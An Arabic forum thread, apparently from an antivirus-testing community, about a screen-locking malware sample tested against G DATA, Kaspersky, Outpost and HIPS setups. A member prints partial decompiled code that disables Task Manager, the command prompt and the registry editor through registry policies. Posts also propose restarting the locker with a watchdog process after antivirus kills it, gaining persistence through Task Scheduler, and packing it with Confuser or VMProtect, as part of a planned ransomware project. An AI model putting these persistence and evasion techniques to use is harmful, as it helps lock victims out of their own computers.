• [ يمنع ] طرح أي موضوع يحوي على كراكات أو باتشات او كيجنات من غير فحصها عبر موقع فيروس توتال [ virustotal.com ] وطرح رابط الفحص ضِمن الموضوع.

  • بادئ الموضوع بادئ الموضوع black007
  • تاريخ البدء تاريخ البدء
  • المشاهدات 3,297
الحالة
مغلق و غير مفتوح للمزيد من الردود.
بعد اعادة التجربة مره اخرى ...
قمت بكتابة الباسوورد black007 .. دخلت على سطح المكتب ... وبالفعل قام بتعطيل موجه الاوامر

النود فشل هذه المره :unsure:
ما وضع الهيبس عندك اخي(n)
 

توقيع : Ahmad frij
النود

الفحص = لا شيء
السحاب = غير معروف


التشغيل
تلقائي = فشل

قمت بعمل الجدار والهيبس يدويين .
وهذه النتيجه

عند فتح الملف اعطاني انذار
8IEz2V.png

عملت رفض ..


ف تم غلق الشاشة مع هذا الخطا ..
rrkSa4.png


مع تكرار التجربة عملت سماح للرساله الاولى .. طلع نفس الخطا ولم تظهر اي رسائل من الهيبس ..


بالمعنى

= النود فشل في الاكتشاف بالمحرك وبالهيستوريك .. وفشل بالسحاب .. وفشل بالتلقائي وفشل باليدوي =

:unsure::unsure::unsure::unsure:
 
لكل جواد كبوة !
 
توقيع : أبو رمش
هذة الشركة من اغرب ما رايت يوجد بها ميزات الى الان لم تصل بعض الى نصف تقنياتها لكنها تخلت عن المنتج بكل بساطة :(

عندك حق ابسط شىء البرنامج عندى بدون سيريال ويقبل التحديث من سيرفر الشركه بدون مشاكل معنى كده ان الشركه تخلت عن البرنامج او لم تعد تهتم به وللاسف هذا البرنامج به تقنيات لم تصل برامج اليها حتى الان والدليل البرنامج بدون سيريال من 6 اشهر

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
 
توقيع : forgotyou
عندك حق ابسط شىء البرنامج عندى بدون سيريال ويقبل التحديث من سيرفر الشركه بدون مشاكل معنى كده ان الشركه تخلت عن البرنامج او لم تعد تهتم به وللاسف هذا البرنامج به تقنيات لم تصل برامج اليها حتى الان والدليل البرنامج بدون سيريال من 6 اشهر

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
كيف تخلت عنه الشركة وفي نفس الوقت ترسل تحديثات لهذا البرنامج
 
توقيع : hitman samir12
هل تذكر أخر باتش طلبتة منك ان يقوم بعل شاشة زرقاء وكل باتشاتك القديمة التي كانت تعمل بكفائة الان عند تشغيلها وقتل العملية لا تظهر شاشة الزرقاء واكد هذا الكلام أحمد انتي فايروس وقال انها لم تعد تعمل ولا يعرف السبب
برامج الحماية صارت تعترض سلوك اظهار الشاشة الزرقاء وكذلك هناك برامج لقتل العمليات تمنع ظهورها

السلام عليكم

التويستر اكتشف الملف بمجرد فك الضغط
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي


لكن الغريب انى اغلقت وحده الانتى فيرس وتشغيل وحده الديفنس وول لم يستطع التصدى للملف وتم السيطره على الشاشه الظاهر ان الوحدتين مرتبطين ببعض

بس جدار الاوتبوست سيطر على الملف بكل سهوله
واضح من التسمية لو لاحظتو كلمة Packed Confuser معنى كدا أنه قدر يتعرف على الحماية وبالنسبة له الحالة دي مبتحصلش إلا لما يتم تحطيم الحماية في الذاكرة فواضح أنه اكتشف الملف بعد تحطيم حمايته او تشفيره في الذاكرة
علشان نتاكد أنا ح افك الحماية ولو حضرتك ممكن تفحصه بالمرحرك علشان نتأكد لأنني أظن أنه مكتشف من المحرك

G DATA INTERNET SECURITY

2DrZzG.jpg



رسالة واضحه

GcYYDw.jpg


البرنامج تلقائي لم اعدل عليه

طيب وهذا الشي اللي صار الملف غير مكتشف بالفحص , الملف اكتشف بالتشغيل , والرساله تقول برنامج الحمايه اكتشف شي غريب وغير معروف

,,

وهذي صورة جديده للتنبيه مايقوم به الفايروس

wJD65B.jpg

جميل جدا من الجي داتا

~___________"*"___________~

آه بقولك أبلاك بالنسبة للكاسبر
ممكن تحط في الملف كود بحيث أن لو ضغطت على الحروف بتاعة فك الشاشة في الكاسبر الملف يقفل نفسه
وتدمج معاه ملف تاني فيه شرط بحيث انه لما عملية الملف الأول الي هو ملف قفل الشاشة او الرانسوم وير تنقتل
هو ينتظر مثلا كام ثانية عن طريق تايمر مثلاً
علشان
الكاسبر ميقتلوش هو كمان
بعد كدا يعيد تشغيل الملف
بالنسبة لأضافة الستارت اب فأنا اقترح انك تدمج معاه ملف بات يضيف ستارت اب عن طريق الـ
Task Scheduler
لأنها بتقبل الأوامر بالسويتشات
فانتا ممكن تعمله
Start With Logon
ممكن تبحث عن السويتشات في جوجل أو أنا هجيبهالك أن شاء الله من عندي
ملحوظة
: دي كانت خطة مشروع الرانسوم وير الي كنت بفكر ان شاء الله أعمله يوم الخميس
+
جاري الكسر:D

~
 
توقيع : MagicianMiDo32
جربت Nofuser البائسة لم تفك الحماية كاملة
لكن انظرو ماذا وجدت
!
قتل التاسك مانيجر والكوماندبرومبت والريجستري ايديتور من الريجستري
عدلت عليه لألغائه

[hide]
Private Sub
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
(ByVal sender As
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
, ByVal e As
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
)
Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
=
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
(
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
("WScript.Shell", ""))
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
(Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
, Nothing, "regwrite", New
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
() { "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD" }, Nothing, Nothing, Nothing, True)
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
(Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
, Nothing, "regwrite", New
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
() { "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", 1, "REG_DWORD" }, Nothing, Nothing, Nothing, True)
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
(Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
, Nothing, "regwrite", New
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
() { "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD" }, Nothing, Nothing, Nothing, True)
End Sub

[/hide]



و
Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
= True
طيب لوكانت
Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
= False

=
أعمل Dumb وعيش :)
 
توقيع : MagicianMiDo32
آه بقولك أبلاك بالنسبة للكاسبر
ممكن تحط في الملف كود بحيث أن لو ضغطت على الحروف بتاعة فك الشاشة في الكاسبر الملف يقفل نفسه
وتدمج معاه ملف تاني فيه شرط بحيث انه لما عملية الملف الأول الي هو ملف قفل الشاشة او الرانسوم وير تنقتل
هو ينتظر مثلا كام ثانية عن طريق تايمر مثلاً
علشان
الكاسبر ميقتلوش هو كمان
بعد كدا يعيد تشغيل الملف
بالنسبة لأضافة الستارت اب فأنا اقترح انك تدمج معاه ملف بات يضيف ستارت اب عن طريق الـ
Task Scheduler
لأنها بتقبل الأوامر بالسويتشات
فانتا ممكن تعمله
Start With Logon
ممكن تبحث عن السويتشات في جوجل أو أنا هجيبهالك أن شاء الله من عندي
ملحوظة
: دي كانت خطة مشروع الرانسوم وير الي كنت بفكر ان شاء الله أعمله يوم الخميس
+
جاري الكسر:D

~

طب وليه اللفه مانا خليه كل محاجه تقتله يعيد تشغيل نفسه

كله من داخل السورس بدون دمج

انتظر ان شاء الله الاصدار القادم منه ساضيف بعض الخدع فيه

ولكن بعد الانتهاء من ملف المسابقه الجديد ان شاء الله
 
توقيع : black007
جربت Nofuser البائسة لم تفك الحماية كاملة
لكن انظرو ماذا وجدت
!
قتل التاسك مانيجر والكوماندبرومبت والريجستري ايديتور من الريجستري
عدلت عليه لألغائه

[hide]
Private Sub
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
(ByVal sender As
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
, ByVal e As
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
)
Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
=
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
(
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
("WScript.Shell", ""))
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
(Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
, Nothing, "regwrite", New
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
() { "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD" }, Nothing, Nothing, Nothing, True)
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
(Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
, Nothing, "regwrite", New
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
() { "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD", 1, "REG_DWORD" }, Nothing, Nothing, Nothing, True)
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
(Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
, Nothing, "regwrite", New
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
() { "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD" }, Nothing, Nothing, Nothing, True)
End Sub

[/hide]



و
Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
= True
طيب لوكانت
Me.
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
= False

=
أعمل Dumb وعيش :)

على فكره حمايه Confuser من اقوى الحمايات الى بتبقه على الملف

علشان كده الاداه معرفتش تفك الملف بشكل كامل

خصوصا بعد رفع الاعدادات الخاصه ب Confuser

فى المره القادمه ساقوم بتغيير الحمايه وساضع لك حمايه اخرى تعيش معها

حمايه انت بتحبها جدا

safe engine او VMProtect
 
توقيع : black007
على فكره حمايه Confuser من اقوى الحمايات الى بتبقه على الملف

علشان كده الاداه معرفتش تفك الملف بشكل كامل

خصوصا بعد رفع الاعدادات الخاصه ب Confuser

فى المره القادمه ساقوم بتغيير الحمايه وساضع لك حمايه اخرى تعيش معها

حمايه انت بتحبها جدا

safe engine او VMProtect
:dead:
,ولابطيق ريحتها
:dead:
:bag
 
توقيع : MagicianMiDo32
طب وليه اللفه مانا خليه كل محاجه تقتله يعيد تشغيل نفسه

كله من داخل السورس بدون دمج

انتظر ان شاء الله الاصدار القادم منه ساضيف بعض الخدع فيه

ولكن بعد الانتهاء من ملف المسابقه الجديد ان شاء الله
الكاسبر حيقفشه يامعلم
دي المشكلة
استر يارب
أعوذ بك من الكونفيوزر والسيف انجن
بقولك عدلت ع الملف قمت بوظته
حجرب من تاني
 
توقيع : MagicianMiDo32
G DATA INTERNET SECURITY

2DrZzG.jpg



رسالة واضحه

GcYYDw.jpg


البرنامج تلقائي لم اعدل عليه



أي اصداار هذا ياااغااالي ؟؟

لي فتره أريد تحربه الجي داتا .. ولكن ما يعيقني ( التحديثااات )


هل مااازل يحتااج وقت كبير لتحميل الأبديت ؟ وبالنسبه لاستخدام البرنامج للمواارد ؟ !! أريد التجربه علي الوهمي ..
 
توقيع : alaa8iniesta
G DATA INTERNET SECURITY

2DrZzG.jpg



رسالة واضحه

GcYYDw.jpg


البرنامج تلقائي لم اعدل عليه


يااخى انا جربت البرنامج الان وفشل فى التصدى للملف لاادرى كيف حدث هذا معك
 
أي اصداار هذا ياااغااالي ؟؟

لي فتره أريد تحربه الجي داتا .. ولكن ما يعيقني ( التحديثااات )


هل مااازل يحتااج وقت كبير لتحميل الأبديت ؟ وبالنسبه لاستخدام البرنامج للمواارد ؟ !! أريد التجربه علي الوهمي ..


النسخة 2015 ( الاخيره )

بنسبة لأستهلاك الموارد لا مايسحب كثر او يمكن عشان الرامات عندي 8

فيه عيب بسيط والى الان مالقيت له حل كل ما ادخل صفحه جديده لازم يسوي فحص ويظهر شريط في الاسفل ( ممل )

تحديثات البرنامج كبيره واضن السبب انه يستخدمين محركين
 
يااخى انا جربت البرنامج الان وفشل فى التصدى للملف لاادرى كيف حدث هذا معك

بصراحة ما ادري النسخة عندي 2015 G DATA INTERNET SECURITY

تلقائي غير معدل
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى